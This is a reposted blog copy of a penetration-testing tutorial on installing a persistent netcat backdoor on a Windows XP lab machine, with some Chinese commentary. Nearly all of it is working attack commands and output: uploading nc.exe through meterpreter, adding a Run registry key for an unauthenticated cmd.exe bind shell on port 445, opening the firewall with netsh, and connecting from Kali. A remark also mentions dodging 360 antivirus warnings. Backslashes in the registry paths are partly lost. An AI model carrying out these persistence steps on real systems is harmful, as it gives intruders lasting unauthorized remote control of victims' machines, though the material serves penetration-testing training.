zoukankan html css js c++ java

Persistent Netcat Backdoor

　　In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\windows\system32
[*] uploading  : /tmp/nc.exe -> C:windowssystem32
[*] uploaded   : /tmp/nc.exe -> C:windowssystem32nc.exe

　　Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLMsoftwaremicrosoftwindowscurrentversion un’.

meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
Enumerating: HKLMsoftwaremicrosoftwindowscurrentversion
un

  Values (3):

    VMware Tools
    VMware User Process
    quicktftpserver

meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32
c.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
Key: HKLMsoftwaremicrosoftwindowscurrentversionRun
Name: nc
Type: REG_SZ
Data: C:windowssystem32
c.exe -Ldp 445 -e cmd.exe

　　使用命令行自带的reg命令也行，前提是系统杀毒软件不出提示:

REG ADD HKLMsoftwaremicrosoftwindowscurrentversion
un /v nc /t REG_SZ /d "c:xxx.exe"

　　Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsJimMy Documents > netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable

　　We open up port 445 in the firewall and double-check that it was set properly.

C:Documents and SettingsJimMy Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.

C:Documents and SettingsJimMy Documents > netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
445    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service


C:Documents and SettingsJimMy Documents >

　　So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsJim > dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726

Directory of C:Documents and SettingsJim

05/03/2009 01:43 AM
.
05/03/2009 01:43 AM
..
05/03/2009 01:26 AM 0 ;i
05/12/2009 10:53 PM
Desktop
10/29/2008 05:55 PM
Favorites
05/12/2009 10:53 PM
My Documents
05/03/2009 01:43 AM 0 QCY
10/29/2008 03:51 AM
Start Menu
05/03/2009 01:25 AM 0 talltelnet.log
05/03/2009 01:25 AM 0 talltftp.log
4 File(s) 0 bytes
6 Dir(s) 35,540,791,296 bytes free

C:Documents and SettingsJim >

　　Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

　　.使用sc创建自定义服务，留下后门，但是有个问题是360还是会提示，防止注册表被写入

作者： NONO
出处：http://www.cnblogs.com/diligenceday/
企业网站：http://www.idrwl.com/
开源博客：http://sqqihao.github.io/
QQ：287101329
微信：18101055830

查看全文

相关阅读:
POJ 3660 Cow Contest 任意两点之间的关系 Floyd
CDOJ 1146 A
TTTTTTTTTTTTTT CDOJ Sliding Window 线段树（nlogn）或双端队列（n）模板
 CDOJ 203 并查集+优先队列好题
 CDOJ 1073 线段树单点更新+区间查询水题
 CDOJ 1070 秋实大哥打游戏带权并查集
 CDOJ 1063 堆排序模板
 CDOJ 1069 秋实大哥去打工单调栈下标处理
 CDOJ 1061 C
巨蟒python全栈开发django14:Form组件

原文地址：https://www.cnblogs.com/diligenceday/p/6882085.html